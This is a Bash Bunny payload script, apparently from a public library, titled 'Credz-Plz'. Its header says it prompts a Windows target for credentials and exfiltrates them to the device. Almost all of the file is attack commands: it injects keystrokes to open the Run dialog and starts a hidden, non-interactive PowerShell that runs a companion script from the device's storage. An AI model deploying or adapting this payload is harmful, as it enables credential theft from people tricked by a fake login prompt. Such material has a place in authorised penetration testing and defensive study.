bashbunny-payloads/payloads/library/credentials/-BB-Credz-Plz/payload.txt

# Title:         Credz-Plz
# Description:   A script used to prompt the target to enter their creds to later be exfiltrated to the Bash Bunny
# Author:        I am Jakoby
# Version:       1.0
# Category:      Recon
# Attackmodes:   HID, Storage
# Target:        Windows 10, 11

LED SETUP

GET SWITCH_POSITION

ATTACKMODE HID STORAGE

LED STAGE1

QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Credz-Plz.ps1')"
QUACK ENTER